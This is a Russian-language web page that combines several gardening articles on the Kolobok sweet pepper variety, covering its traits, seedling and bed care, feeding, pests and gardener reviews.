29 просмотров
Рейтинг статьи
1 звезда 2 звезды 3 звезды 4 звезды 5 звезд
Загрузка...

Характеристика и описание сорта перца колобок выращивание и уход

Перец Колобок: сладкий и круглый сорт

Родина Колобка — город Тирасполь, Молдова. Районирован он для одного российского региона — Северного Кавказа. Однако это один из самых популярных сортов в РФ. Прославился он урожайностью и отличным вкусом на фоне неприхотливости и скороспелости.

Описание перца сорта Колобок

Сорт относится к томатовидным перцам, в Молдове их называют гогошарами, а на Украине — ратундами. Главные отличительные признаки — шарообразные плоды с толстыми, мясистыми и очень сочными стенками. Колобок растёт компактным кустом высотой всего 30–40 см. Плоды некрупные, но за счёт высокой плотности они тяжёлые, внутри почти нет пустоты. Толщина стенки — около 1 см.

У Колобка толстые стенки, пустоты внутри почти нет

Вес одного плода — 102–167 г, многим огородникам удавалось получить перцы по 200 г и больше. Урожайность с квадратного метра довольно высокая — до 4.8 кг. Достигается она за счёт плотной посадки, ведь миниатюрные кусты можно сажать чаще, чем обычные перцы.

У Колобка плоды некрупные, но их много на кусте

Кроме того, Колобок скороспелый сорт, от всходов до технической спелости проходит 100 дней, а до полной биологической — 160–179. Если сравнить со среднеспелыми сортами и гибридами, то разница в сроках созревания составляет около 30 дней, то есть пока растут крупноплодные перцы, вы сможете лакомиться сочными Колобками.

Основное назначение этого сорта — потребление в свежем виде. Перцы гогошары настолько вкусны, что их едят, как яблоки, без приправ и термообработки. Они отлично подходят для салатов, излишки можно переработать в лечо и другие закуски, законсервировать целиком или заморозить.

Видео: обзор перца Колобок

Плюсы и минусы перца Колобок — таблица

Преимущества Недостатки
Скороспелость Есть перцы и покрупнее
Отличный вкус плодов Урожайность ниже, чем у средних и поздних крупноплодных сортов
Толстые стенки Сорт любительский, а не коммерческий, из-за мелких плодов не востребован на рынке
Высокая урожайность на фоне низкого куста
Экономия места, подходит для загущённых посадок
Доступность семян: есть в магазинах, стоят недорого
Устойчивость к болезням
Возможность выращивать в открытом грунте, парнике, теплице, на балконе

Особенности выращивания

Семена Колобка сейте в начале марта. Перцы относятся к тугодумам и могут долго всходить, неделю и более, поэтому желательно их сначала прорастить или хотя бы замочить в стимуляторах роста: соке алоэ, растворе Эпина, Энергена и т. п.

Часто в своих статьях советую замачивать семена в соке алоэ, опираясь при этом на народную мудрость. Но в наступающем сезоне решила сама попробовать этот метод. Стимулом послужило приобретение семян экзотического растения пепино. Начиталась на форумах, что их всхожесть очень низкая, решила перестраховаться. Замочила семена в чистом соке алоэ, из 5 семечек проросли все, причём на третий день. Чтобы окончательно убедиться в чудодейственных свойствах алоэ, подержала в его соке семена острого перца Хабанеро. Про него тоже много жалоб: у большинства всходы появляются через 3 недели и растут очень медленно. Семена Хабанеро подержала 3–4 часа в неразведённом соке алоэ, потом ещё 2 дня на влажном диске, посеяла. В результате все 5 всходов из пяти семян появились дружно через 8 дней после замачивания в алоэ, или через 5 после посева в землю.

Перцы не любят, когда тревожат их корни, на каждую пересадку отвечают приостановкой развития примерно на неделю. Поэтому семена Колобка лучше посеять сразу в индивидуальные стаканчики объёмом 200 мл. Глубина заделки — 1 см, благоприятная температура для прорастания +25… +27 °C.

Всходы Колобка держите на светлом окне, необязательно южном, перцы не будут вытягиваться и на восточном, и на юго-западном. Если всё же посеяли в общую плошку, то после появления первого настоящего листочка рассадите растения по стаканчикам, стараясь не тревожить корни.

Рассаду пикируйте с комом земли, перцы часто сажают по два в горшочек, а потом и в лунку

Уже в рассадный период Колобок проявляет свою низкорослость, будет меньше перцев других сортов. Уход за молодыми растениями заключается в поливах и подкормках удобрениями для рассады. Если планируете высаживать в открытый грунт, то за 7–10 дней приступайте к закалке.

На постоянное место высаживайте после окончания возвратных заморозков, в парник или теплицу — раньше на 1–2 недели. Схема посадки для Колобка — 40х40 см или 50х30 см. Земля, конечно, должна быть рыхлой и плодородной. Внесите на 1 м² ведро компоста или перегноя и стакан древесной золы.

В этом году тоже планирую посеять и вырастить перцы Колобок. В семье нашей никто сладкий перец не ест, кроме меня, поэтому занимать ими целую грядку не буду. Хочу посеять штук пять, а потом высадить рассаду в пластиковые 10-литровые вёдра по два куста в каждое. Вёдра поставлю на асфальтовую площадку возле дома, место на огороде они занимать не будут. Точно так же собираюсь выращивать низкорослые томаты: по 2–3 кустика разных сортов на пробу.

Уход за перцами после высадки заключается в защите от низких и высоких температур. В холодные дни и ночи (ниже +15 °C) укрывайте кустики. А если ожидаются заморозки, то даже в теплице потребуется дополнительная защита в виде перевёрнутых коробок, пластиковых вёдер и т. п. В жаркие и засушливые дни опрыскивайте листочки чистой водой, такой душ станет ещё и профилактикой паутинного клеща, который быстро плодится в сухом воздухе и не любит влагу.

Даже в теплице порой необходима дополнительная защита от заморозков

Кустики Колобка можно не формировать, они сами ветвятся, образуя компактную крону. Традиционно на всех перцах выщипывают пасынки, которые появляются ниже первой развилки. Можно удалить и нижние листья, растения будут хорошо проветриваться, а плоды освещаться солнцем.

Видео: уход за перцами в теплице

Остальные агроприёмы при выращивании Колобка:

  • Частые и необильные поливы — раз в 2–3 дня по 1–2 л под куст. У компактного куста и корень такой же, располагается в верхних, быстро просыхающих, слоях почвы. По этой же причине землю под перцами желательно не рыхлить, а мульчировать.
  • Подкормки должны быть сбалансированными. Оптимальный вариант — купить специальное удобрение для томатов и перцев или универсальное для овощей и вносить по инструкции. Нельзя после начала цветения поливать органикой, она провоцирует бурный рост зелени в ущерб урожайности.
  • Прополки. Колобок настолько мал, что может затеряться среди сорняков, помогайте ему в конкурентной борьбе с сорными травами.

Самые первые плоды рекомендуется снимать в технической спелости, то есть ещё зелёными. Они оттягивают на себя всё питание, что тормозит развитие следующих.

Отзывы овощеводов-любителей о перце сорта Колобок

У меня в любимцах сорт колобок.вкус супер,болеет по минимуму,урожайность нормальная.на вид плоды не большие и несильно много,но когда берешь в руку,ощущение что держишь яблоко(настолько тяжелый) Толщина стенки самая большая из моих. Выращиваю пару лет из своих семян.перцы растут все вместе,но именно этот сорт не переопылялся(может просто повезло) РЕКОМЕНДУЮ!

mb9

http://forum.vinograd.info/archive/index.php?t-11567-p-2.html

Для завалиться перцем при полном отсутствии затрат на покупку семян,Колобок самое то. По урожайности с куста он конечно уступает гибридам,но его можно садить гуще.И еще один минус-половина веса плода,это семена.

простованя

http://forum.vinograd.info/archive/index.php?t-11567-p-2.html

я в восторге от перцев сорта Колобок! Толстостенные, сочные, вкусные!. Хорошо идут для употребления в свежем виде, салатов, заморозки. И не такие уж они маленькие! Однажды посадив, теперь свои семена собираю и щедро делюсь с коллегами по работе.

Александра Белкина

https://otvet.mail.ru/question/99419662

И мне нравится Колобок. Вкусные, сочные, ароматные перчики. Мы для базаров не выращиваем, а для себя — хорошие сорта. Хотя и крупные тоже есть. Но те уже несколько другие, но тоже вкусные. Сажаю каждый год и буду сажать.

Татьяна Владимировна Афонина

https://otvet.mail.ru/question/99419662

2016 год — не самый удачливый для садоводов. А у меня как раз дебют в выращивании перцев (раньше рассаду сама не сажала). Несмотря на среднюю урожайность, сорт Колобок мне понравился — видела его потенциал в прошлые годы. Так что уверенно буду сажать его и в следующем году. В разрезе — сплошное мясо — на лечо и салаты самое оно. Масса плодов более 200 грамм, в прошлом году плоды были крупнее.

Ирина Г.

http://www.tomat-pomidor.com/forums/topic/1431-%D0%BA%D0%BE%D0%BB%D0%BE%D0%B1%D0%BE%D0%BA/

Низкорослый Колобок выручит тех, у кого маленький участок земли или невысокие потребности в сладком перце. Сорт обладает множеством преимуществ, при этом очень неприхотлив в выращивании.

Характеристика и описание сорта перца Колобок, выращивание и уход

Перцы широко применяются в кулинарии и являются прекрасными источниками витаминов, потому они довольно часто выращиваются садоводами на приусадебных участках. Какие-то разновидности пригодны для создания ароматных приправ, другие придадут пикантности блюдам, а третьи сорта – сладкие – используются для приготовления всевозможных заготовок и салатов. Перец Колобок – один из достойных представителей последнего типа.

Характеристики и описание сорта

Болгарский сладкий перец Колобок является раннеспелым. Сорт был внесен в реестр селекционных достижений в 1983 году. Допущен к выращиванию на участках Северо-Кавказского региона и рекомендуется для культивирования в открытом грунте. Имеет компактный и аккуратный куст, обычно вытягивающийся до 25-40 см в высоту.

Согласно описанию оригинатора, этот сорт имеет следующие характеристики:

  • сроки созревания составляют 132-179 дней с момента появления ростков до биологической спелости;
  • интересная круглая форма плодов томатного типа, они гладкие и ровные. Окрашены в светло-зеленый цвет на этапе технической спелости и приобретают темно-красный оттенок на биологической.

Урожайность сорта составляет 2,3-4,8 кг/м 2 при массе одного перчика 102-167 г за счет довольно толстых и плотных стенок толщиной 6,3-10,1 мм.

Перцы Колобок подойдут для употребления в свежем виде, также их можно использовать для консервирования. Из перцев можно делать вкусные домашние заготовки. Плоды прекрасно сохраняют свои полезные свойства в замороженном виде.

Достоинства и недостатки

Перец Колобок имеет несколько основных достоинств, за которые его любят садоводы:

  • прекрасные вкусовые качества урожая. Притом вкус остается на высоте даже у консервированных плодов;
  • высокие показатели урожайности;
  • небольшие, но увесистые плоды, имеющие толстые стенки;
  • сорт рекомендован для выращивания на улице, но он отлично плодоносит и в теплицах;
  • не капризен в уходе.

Как таковых недостатков у сорта не выявлено. Но растения в средней степени могут пострадать от антракноза, фузариозного увядания. К мозаике и вершинной гнили плодов Колобок достаточно устойчив.

Агротехника выращивания и ухода

Выращивать перцы Колобок не сложнее, чем других представителей этого типа культур. Важно уделить внимание предпосевной подготовке семян. Профилактические мероприятия позволят получить сильную рассаду.

Семена для начала требуется продезинфицировать. Их опускают в стакан со слабым раствором марганцовки примерно на 25-30 минут. После этого посевной материал ополаскивается проточной водой и замачивается на 24 ч в питательном растворе, приготовленном из специальных препаратов. Это могут быть «Агрикола-3», гумат калия и др. Любой препарат разводится из расчета 1 ч. л./л чистой воды, подогретой до 25-28 градусов. Помимо этого можно использовать раствор древесной золы. Семена перца предварительно помещаются в полотняные мешочки, которые затем укладывают на блюдце, опрыскиваются чистой водой и выдерживаются при температуре +25 градусов в течение пары дней до наклевывания.

После выдержки семян в питательном растворе их можно закалить, поместив на пару дней в холодильник, потом – на день в теплое место (+18 градусов), далее – снова на 2 дня в холод. Все это время мешочки с семенами должны быть немного увлажнены.

Посев на рассаду производится примерно за 55-60 дней до предполагаемой даты высадки на грядки. Для выращивания рекомендуется использовать грунт со следующим составом:

  • торф, перегной, древесные опилки (2:2:1);
  • перегной, дерновая почва (2:1).

В любую из почвосмесей, кроме приобретенной в садоводческом магазине (готовой), требуется добавить суперфосфат и древесную золу (по 1 ст. л./1 ведро). Если грунт хранился на улице, то его заносят в дом, чтобы он согрелся. За день до начала посева семян почву проливают бледно-розовым горячим раствором марганцовки. Ящики для рассады наполняются готовой смесью толщиной около 6-8 см.

Бороздки для посева семян располагаются на расстоянии около 5 см друг от друга. Рекомендуется пролить их питательным раствором. Глубина заделки посадочного материала – 1-1,5 см, а между отдельными семенами выдерживается расстояние в 3-5 см. Затем бороздки присыпают грунтом и немного уплотняют.

Тара с будущей рассадой перцев прикрывается пленкой и убирается в теплое место (24-26 градусов). Примерно через 3 суток грунт опрыскивается теплой водой. Молодые ростки Колобка появятся примерно на 5-6 день, после этого пленка убирается, а емкость с рассадой переезжает на освещенный подоконник и первую неделю выдерживается при температуре всего 14-16 градусов. Постепенно ее повышают до 18-25 градусов днем и 16-17 – ночью. Полив производится еженедельно теплой водой (+25…+30 градусов) после предварительного рыхления.

Когда перчики будут иметь по 2 настоящих листочка, их пикируют в отдельные емкости после предварительного полива (за 3 ч до процедуры). Первые дни пикированная рассада должна быть слегка притенена газетой от прямых солнечных лучей. Полив производится каждые 5-6 дней – важно не залить растения.

Подкормка рассады перцев Колобок производится 3 раза:

  1. Через 14 суток после появления ростков. У кустиков уже появится по 3-4 листочка. Подкормка производится раствором мочевины (1 ст. л./10 л). Также грунт предварительно перед поливом удобрением можно посыпать золой.
  2. Точно так же подкармливаются молодые перцы спустя пару недель.
  3. За 4 дня до момента пересадки рассады в почву вносится еще одна подкормка (1 ст. л. мочевины и 1 ст. л. суперфосфата/10 л).

За пару недель до высадки перцев производится закалка рассады. В комнате, где она стоит, первые дни приоткрывается форточка, далее растения выносятся на лоджию, но при этом притеняются от прямых солнечных лучей. При температуре воздуха ночью +14 градусов на лоджии перцы можно оставлять тут ночевать.

Высадка рассады перца Колобок производится, когда минует угроза заморозков – ориентировочно конец мая-начало июня, а в холодных регионах – середина или конец июня. Грунт должен быть прогретым до 15-16 градусов, в целом показатель комфортной температуры воздуха для этой культуры равен +20-25 градусов. Рассада предварительно проливается водой. Оптимальная схема посадки – 45 см между отдельными растениями и 50-60 см – между рядами. Лунки должны быть такого размера, чтобы в них помещался ком земли с корнями, в каждую насыпается по 1 ст. л. калийного удобрения без хлора, после этого ямки проливаются водой. При посадке заглублять кустики не нужно, их присыпают землей по корневую шейку. У каждого перчика нужно поставить небольшую опору для подвязки стебля.

Важно помнить, что не стоит располагать близко друг к другу посадки сладкого и жгучего перцев – они будут опылять друг друга, и сладкие сорта начнут горчить.

Перцы Колобок после высадки в открытый грунт закрывают пленкой, которая опирается на металлические дуги-опоры высотой 100 см. Если по ночам еще прохладно, то рекомендуется использовать двойной слой полиэтилена. Открывать парник можно не ранее 15 июня, но по ночам гряду лучше все равно закрывать.

Первый полив проводят сразу после посадки, затем, по мере необходимости, через каждые 7-10 дней, постепенно увеличивая количество вносимой воды. Проводить орошение лучше всего в утренние часы или вечером, на заходе солнца. Температура воды должна быть не ниже 25 °С, расход – 10-12 л/м 2 . После того, как почва немного подсохнет, проводят рыхление.

После начала цветения подкормка производится «Агриколой-3» или «Эффектон-Универсалом» (на 100 л воды – 100 г или 1 л соответственно). Расход – 1 л/куст. Удобрять перцы Колобок нужно и во время плодоношения. В 100 л воды разводится 2 ст. л. нитрофоски и ведро птичьего помета, смесь настаивается 5 дней. Используется в количестве 1-2 л на куст.

Перец «Колобок»: особенности выращивания и отзывы

Многообразие семенного материала сладких перцев на рынке предоставляет огородникам большое поле для выбора. Среди наиболее достойных сортов данного овоща, особенно выделяется перец «Колобок». Его фото, характеристика сорта, описание основных моментов выращивания и отзывы представлены в данной статье.

Описание сортовых признаков

Перец «Колобок» представляет собой популярный полуштамбовый сорт с компактным, невысоким – 25-40 см, и густооблиственным кустом. Относится «Колобок» к сортам с довольно ранним сроком созревания:

  • 108-112 дней – техническая спелость;
  • 140-145 дней – биологическая спелость.

Совет! Проведение сбора урожая в фазе технической спелости, позволяет собрать дополнительный урожай плодов. К тому же, технически спелые плоды лучше хранятся и транспортируются.

Сорт рекомендуется использовать для культивирования в средней полосе и Сибири, на открытых грядках с использованием временных пленочных укрытий или теплицах.

Характерной особенностью сорта являются толстостенные шарообразные плоды весом до 90-150 г. Толщина слегка граненых стенок перцев «Колобок» может достигать 9-14 мм. Размер плодов в среднем – 5 x 8 см. Окрас:

  • технически спелых – светло-зеленый;
  • биологически спелых – темно-красный.

Перец «Колобок» славиться своей урожайностью, показатель которой с 1 м² может достигать от 3 до 5 кг.

Сочные и сладкие перцы сорта «Колобок» используются для консервирования, замораживания и употребления в свежем виде.

Особенности выращивания

Тепло и влаголюбивое растение, подходит для возделывания в закрытом грунте. Практикуя агротехнику открытого грунта, для его посадки следует выбирать защищенные от порывов ветра и хорошо освещенные участки.

Выращивание перца проводится рассадным методом. Глубина заделки семян в грунт – 2 см. Перец довольно требователен к качеству грунта, поэтому для выращивания рассады следует выбирать легкий и плодородный почвенный субстрат.

Для высадки на грядки используется рассада возрастом 55-65 суток, оптимальный срок высадки – после 10 мая. Глубина посадки рассады – 18 см, промежуток между кустами – 40 см. Последующий уход традиционно заключается в

Внимание! Невысокие штамбовые сорта, к которым также относится перец «Колобок» не требуют формирования куста и поэтому считаются простыми в уходе.

Полив высаженных перцев производится по мере подсыхания грунта, для сохранения влаги в почве, посадки перцев рекомендуется мульчировать. Использование мульчи позволяет не только защитить кусты перца от засухи, но и перегрева.

Для стимулирования обильных урожаев, «Колобок» в период вегетации следует 3 раза подкормить удобрениями, используя как минеральные удобрения – нитрофоску, так и органические, например, куриный помет.

Отзывы о сорте «Колобок»

Нина Петровна: «Развожу «Колобок» из своих семян, которые собираю ежегодно. Для меня это почти единственный подходящий сорт сладких перцев. Вкусный, толстостненный, сочный. Такой приятно и свежим съесть и приготовить, нафаршировав.»

Александра: «В основном я предпочитаю перец привычной конусообразной формы, но «Колобок» мне нравиться за свою урожайность и сладкий вкус. В уходе он такой же, как и остальные перцы. Его небольшие, но довольно тяжелые плоды прекрасно подходят для летних салатов и заготовок на зиму.»

Сергей: «Сорт хорошо показал себя при выращивании в парнике из пленки. Невысокий и простой в уходе. Все, что нужно ему – полив и рыхление, защита от ветра, нечастые подкорми. Дает хорошие дружные урожаи. «Колобок» — универсальный сорт с хорошими вкусовыми качествами, идет на консервацию и употребление в свежем виде.»

Людмила Семеновна: «Перец выращиваю у себя на даче в Подмосковье, в небольшой теплице из поликарбоната. «Колобок» один из сортов, что хорошо прижились у меня, давая стабильные урожаи уже несколько лет. Часто посадки пера совмещаю с выращиванием помидоров. Про «Колобок» могу сказать – не капризный, не требует формовки, хорошо плодоносит. Сами плоды – толстостенные, вкусные сочные.»

Выращивание перца «Колобок» позволяет получить хорошие урожаи качественных толстостенных сладких перцев, приложив при этом небольшое количество усилий.

Лучшие сорта перца 2017 — видео

Проверенный временем сорт перца «Колобок» с необычной формой и отменным вкусом

Садоводов всегда привлекали культуры с необычными плодами. Поэтому селекционеры не перестают работать над новыми сортами и гибридами, отвечающими такому спросу. Благодаря этому на рынке появился и перец интересной круглой формы, который называется томатным.

Такой формой обладает перец Колобок. Помимо непривычного внешнего вида, плоды этого сорта отличаются толстыми стенками и сладким вкусом. Сами растения славятся своей неприхотливостью и устойчивостью к неблагоприятным факторам окружающей среды. Чем еще порадует Колобок садоводов – читайте далее.

Что это за сорт перца

Колобок – это сорт перца, выведенный отечественными селекционерами в 1979 г. Его оригинатор — Ю. И. Панчев.

В российский государственный реестр сорт внесен в 1983 г. С тех пор он не утратил своей популярности. Его выращивают садоводы во всех странах бывшего СНГ.

Обратите внимание! Семена урожая Колобка используют для выращивания. Это сортовой перец, поэтому из его семян получаются растения с такими же признаками.

Отличительные черты

Главной отличительной чертой Колобка считается необычная форма его плодов. Перцы получаются круглыми и напоминают красные томаты. Особенно легко спутать их с помидорами на фото.

Внутри плода практически нет свободного пространства. Его толстые стенки соприкасаются с семенами. Вкус плодов насыщенный сладкий с легкой кислинкой и перечным ароматом. В стадии технической спелости горчинка отсутствует.

Кусты Колобка низкорослые. Они не требуют подвязки и пасынкования, что существенно облегчает уход за ними.

Отличается сорт и повышенным иммунитетом к болезням пасленовых культур. Он не боится похолоданий и подходит для выращивания в центральных и северных регионах нашей страны.

Плоды Колобка подходят для употребления в свежем виде. Используют их для консервации целиком и в виде лечо. Подходит такой перец и для заморозки.

Единственное заболевание, к которому сорт не имеет резистентности – фузариозное увядание.

Основные характеристики Колобка

Колобок подходит для выращивания во всех регионах нашей страны. Он обладает высокой урожайностью и дает необычные плоды круглой формы.

Характеристики и описание сорта:

Параметр Показатели
Тип куста Кустовой, детерминантный. Полуштамбовый. Высота куста варьируется в пределах 30-40 см. Стебли толстые и мощные. Кусты сильно ветвятся. Тип завязей букетный. Листья небольшие, ярко-зеленые с легкой гофрированностью.
Способ выращивания Холодоустойчивый. В южных и центральных регионах выращивают в открытом грунте. В городах с холодным климатом перцы сажают в теплицы.
Урожайность Высокая. С 1 кв. м собирают до 6 кг урожая.
Плоды Имеют средние размеры. Вес одного плода варьируется в пределах 100-150 г. Диаметр каждого плода не превышает 8 см. Форма круглая, с выраженной ребристостью у основания переходящей на все тело. Цвет насыщенно-красный. Толщина стенок варьируется в пределах 8-12 мм. В редких случаях толщина стенок достигает 2 см. Вкус плодов сладкий с легкой кислинкой. Горечь отсутствует даже в стадии технической зрелости.
Транспортабельность Высокая. Плоды хранятся в прохладном месте более 2 недель. Подходят для транспортировки на большие расстояния.
Сроки созревания Раннеспелый. Стадии технической зрелости достигают на 100-110 дней. Через 3-4 недели плоды готовы к сбору.
Устойчивость к болезням Имеет иммунитет к большинству болезней пасленовых культур.

Подготовка к выращиванию

Перец выращивают рассадным способом. Делают это как дома на подоконнике, так и в теплице. Во втором случае рассада получится более крепкой и выносливой.

Для рассады важно подготовить грунт. Его приобретают в магазине (универсальная почвосмесь или почва для томатов и перца) или готовят самостоятельно.

Чтобы приготовить грунт для рассады используют один из способов:

  • берут равные порции торфа и садовой земли и добавляют к ним одну часть опилок;
  • смешивают 2 части перегноя и 1 часть дерновой земли.

В ведро полученной смеси добавляют по 1 ст. л. суперфосфата и золы. Ингредиенты тщательно перемешивают.

Перец рекомендуется сеять сразу в индивидуальные горшочки — он не любит пикировки. Лучше использовать торфяные емкости, но подойдет и пластиковая тара с дренажными отверстиями. Иногда все семена сеют в деревянные и пластиковые ящики.

Почву и емкости дезинфицируют. Для этого используют темно-розовый раствор марганцовки.

Семена готовят к посадке. Они проходят несколько этапов обработки:

  1. Семечки осматривают на предмет повреждений и темных пятен. Их замачивают в подсоленной воде комнатной температуры. Через полчаса всплывшие экземпляры выкидывают, так как они не взойдут.
  2. Посадочный материал замачивают на полчаса в растворе марганцовки, на 15 мин. в перекиси водорода или на 12 ч в соке алоэ.
  3. Затем на 24 ч семечки замачивают в стимуляторе роста. Часто используют покупные препараты «Эпин», «Гумат калия» или «Агрикола-3». На 1 л воды комнатной температуры берут 1 ч. л. средства. Используют и домашние рецепты. Например, 1 ч. л. меда разводят в 1 ст. воды.
  4. Обработанный стимулятором роста посадочный материал заворачивают во влажные кусочки ткани и помещают на двое суток в холодильник. Затем их сутки выдерживают в тепле и снова сутки в холодильнике.

Выращивание рассады

Рассаду начинают выращивать за 80 дней до предполагаемой высадки в открытый грунт. Время высевки зависит от региона:

  • города с южным климатом – конец февраля;
  • центральные регионы – начало марта;
  • северные регионы – конец марта.

Перед тем, как приступать к посеву семян, почву заносят на 2 суток в помещение. За это время она прогреется.

Посадка перца

В ящики засыпают песок и грунт так, чтобы до края оставалось свободными 4 см. Семена выкладывают на почву рядами, между которыми оставляют свободными 3 см. Между семенами также оставляют расстояние 2 см.

Посадочный материал присыпают трехсантиметровым слоем грунта, поливают теплой водой со стимулятором роста, накрывают пленкой и убирают в теплое место.

Если семена выращивают сразу в индивидуальных горшочках, то в каждую емкость сеют по 1 семечке на глубину 3 см. Такую тару тоже накрывают пленкой и ставят в тепло.

Дальнейший уход

Чтобы получить крепкую и здоровую рассаду, за ней нужно правильно ухаживать. Вот основные правила:

  1. После прорастания семян пленку снимают. Рассаду переставляют в хорошо освещенное место.
  2. Чтобы предотвратить наклон рассады в одну сторону, ее периодически разворачивают к окну. Этого делать не придется, если для подсветки используют люминесцентные лампы.
  3. Поливают растения 1-2 раза в неделю. Важно не допускать пересыхания и переувлажнения почвы.
  4. После образования 2 настоящего листочка рассаду пикируют в индивидуальные емкости (если семена высеивали в общий ящик). Извлекая растения, их придерживают за листья. Перцы помещают в горшочки, не заглубляя корневую шейку. После пикировки растения на несколько дней накрывают газетой.
  5. За неделю до пикировки перца на постоянное место его начинают закалять. Для этого выносят на улицу.

Рассаду подкармливают трижды. Используют следующую схему:

  1. Через 2 недели после пикировки почву присыпают золой. Затем растения поливают составом, приготовленным из 10 ст. л. воды и 1 ст. л. мочевины.
  2. Через 2 недели растения поливают 1 ч. л. мочевины, разведенной в 1 ст. воды.
  3. За 4 дня до пикировки перца на постоянное место вносят последнюю подкормку. В этот раз используют средство, которое готовится из ведра воды, 1 ст. л. мочевины и 1 ст. л. суперфосфата.

Особенности выращивания Колобка

В открытый грунт Колобок высаживают, когда почва прогреется и минует угроза заморозков. Обычно это происходит во второй половине мая.

Для перца выбирают солнечный, но защищенный от ветра участок сада. Лучше всего подойдет южная часть земельного надела.

Для перца не подходят грядки, на которых ранее росли другие пасленовые культуры. Нельзя размешать картофель и перец других сортов рядом с ними.

Пикировка на постоянное место

Грядки для выращивания перца подготавливают осенью. Их перекапывают и очищают от сорняков. На каждый 1 кв. м грунта вносят 6 кг коровьего помета или перегноя.

Если кислотность грунта повышена, ее снижают с помощью сухой извести или золы. Тяжелые почвы разрыхляют с помощью песка.

Лунки выкапывают рядами. На 1 кв. м помещают 5-6 растений. Некоторые садоводы используют загущенную посадку растений и высаживают на 1 кв. м до 9 перцев.

Перед пикировкой рассады в каждую лунку засыпают по 1 ст. л. калийных гранулированных удобрений. Затем в углубления вливают по 1 л теплой воды.

Растения высаживают на грядки, не заглубляя корневую шейку. Чтобы рассада легче извлекалась из горшков, ее поливают за день до пикировки.

Грядки накрывают на ночь пленкой до середины июня. Укрытие делают и днем в прохладную погоду.

Правила ухода

Колобок не нуждается в пасынковании и формировании. Урожайность этого низкорослого сорта обеспечивает именно ветвистость его кустов. Подвязывать перец тоже не придется.

Поливают перец 1-2 раза в неделю. Используют теплую воду. На 1 кв. м вносят до 12 л жидкости. До цветения грядки поливают дождевым способом. Затем жидкость льют только под корень.

После каждого полива грунт рыхлят. Его обязательно очищают от сорняков.

Совет! Опытные садоводы рекомендуют мульчировать почву пленкой, соломой, сеном, перегноем или корой и листьями деревьев. Это замедлит рост сорняков, а также защитит корни растений от похолоданий и вредителей.

Подкармливают перец не менее 3 раз за сезон. Используют покупные удобрения («Агрикола-3», «Эффектон-Универсал») или самодельные препараты. В списке представлены рецепты приготовления некоторых из них:

  1. В ведре воды разводят 1 кг птичьего помета. Смесь настаивают 5 дней, затем в нее добавляют 1 ч. л. нитрофоски и используют для полива кустов.
  2. В ведре воды настаивают сутки скорлупу 8 яиц и кожуру 5 бананов. Средство используют во время формирования завязей.
  3. В бочку насыпают измельченные травы (подорожник, крапиву, ромашку и т.д.). Зеленая масса должна заполнить половину объема. Остальное пространство заполняют водой. Смесь настаивают в течение недели.

За сутки до внесения удобрений перцы поливают чистой водой, чтобы подкормки не сожгли корень.

Перец опыляется насекомыми. Чтобы привлечь опылителей, кусты опрыскивают средством, приготовленным из 10 л воды, стакана сахара и 1 ст. л. борной кислоты.

Совет! Многие садоводы готовят удобрения из сорняков и растительных остатков, собранных с собственных грядок. В смесь также добавляют хлеб и варенье для лучшего брожения.

Характерные болезни и вредители

Сладкий перец Колобок не боится болезней пасленовых культур. У него нет устойчивости только к фузариозному увяданию.

Чтобы защитить растения от инфекции, важно соблюдать все правила ухода. Особое внимание уделяют дезинфекции почвы и садового инструмента, а также удалению растительных остатков.

Для профилактики заболеваний кусты обрабатывают слабым раствором марганцовки или бордосской жидкостью.

Растения часто поражают вредители. Для борьбы с ними используют следующие методы:

  1. Листья, пораженные тлей, паутинным клещом или белокрылкой, промывают теплой водой с добавлением мыла (1 кусок на 1 ведро воды). Если это не поможет, растения опрыскивают Вертицилином, разведенным в воде (100 г на ведро). Процедуру проводят трижды за 10 дней.
  2. Чтобы защитить перец от слизней, почву обрабатывают каждые 2 суток негашеной известью. На каждый 1 кв. м раскладывают по 5 гранул метальдегида.

Для предотвращения атаки медведок используют следующие методы:

  1. Весной почву перекапывают. Найденных личинок уничтожают.
  2. Поздней осенью устанавливают ловушки. Для этого на грядках делают углубления в 40 см, которые заполняют навозом. Весной навоз выкапывают и сжигают вместе с личинками, которые туда отложит медведка.

Преимущества и недостатки сорта

Преимущества сорта:

  • устойчивость к заболеваниям;
  • отсутствие необходимости подвязки и пасынкования;
  • высокая урожайность;
  • необычная форма плодов;
  • толстые стенки и сладкий вкус перцев;
  • холодоустойчивость;
  • неприхотливость в уходе.

Недостатки у Колобка не выявлены.

Отзывы

Большинство садоводов оставляют хорошие отзывы о Колобке. Это один из самых толстостенных и сочных перцев.

Валерия, г. Солнечногорск: «Выращиваю Колобок в открытом грунте не первый год. Очень неприхотливый перец, который подойдет даже для дачи. Плоды получаются круглыми, ярко-красными, похожими на помидорки. Как на фотографии на упаковке. Не болел, не требует частого полива».

Александра, г. Валуйки: «Колобок решила попробовать из-за необычной формы. Перец действительно не требует подвязки и пасынкования. Очень легко его выращивать. Стенки у плодов очень толстые. Для лечо и салатов подходят идеально. Особенно интересно такие перчики выглядят в фаршированном виде».

Заключение

Перец Колобок – один из самых неприхотливых сортов этой культуры. Он способен расти не только в южных, но и в центральных регионах. При этом ему не нужны подвязка, пасынкование и ежедневные поливы. Этот сорт подойдет даже дачникам, которые не каждый день бывают на участке.

Не только неприхотливостью в уходе славится Колобок. Он отличается необычными круглыми плодами со сладким вкусом и толстыми стенками. Попробуйте вырастить этот сорт, и он обязательно порадует вам замечательным урожаем.

Перец сладкий Колобок: фото, отзывы, особенности сорта

Срок созревания: раннеспелый (107-110 дней)
Форма, масса плодов: округлые, томатного типа весом 80-90 гр.
Урожайность: 2,3 – 4,8 кг с кв. м.
Тип куста: низкорослый
Выращивание: открытый, закрытый грунт


Любителей овощей необычной формы непременно заинтересует перец Колобок. Округло-приплюснутые плоды относятся к гогошарному типу, т. е. напоминают по форме помидоры. Эти «колобки» стали очень популярны среди поклонников пасленовой культуры, благодаря отличному насыщенному вкусу, раннеспелости и универсальности использования.

Характеристика и описание сорта

Сорт сладкого перца Колобок относится к раннеспелым. После начала вегетационного периода (появление всходов) плоды достигают технической зрелости на 107-110 день. Колобок предназначен для выращивания в открытом грунте, теплицах и под пленочными укрытиями.

В описании сорта указано, что культивар относится к полуштамбовым растениям высотой 40 см, в теплице – до 60 см. Это означает, что куст компактный, густооблиственный и имеет достаточно крепкий стебель, способный выдержать вес собственных плодов.

Перцы имеют округлую, приплюснутую с полюсов форму с гладкой поверхностью. При молочной спелости кожура окрашена в салатный цвет, который по мере созревания меняется на темно-красный (см. фото).

Другая разновидность сорта – Колобок желтый. Отличается от классического повышенным содержанием сахаров и золотисто-оранжевым цветом.

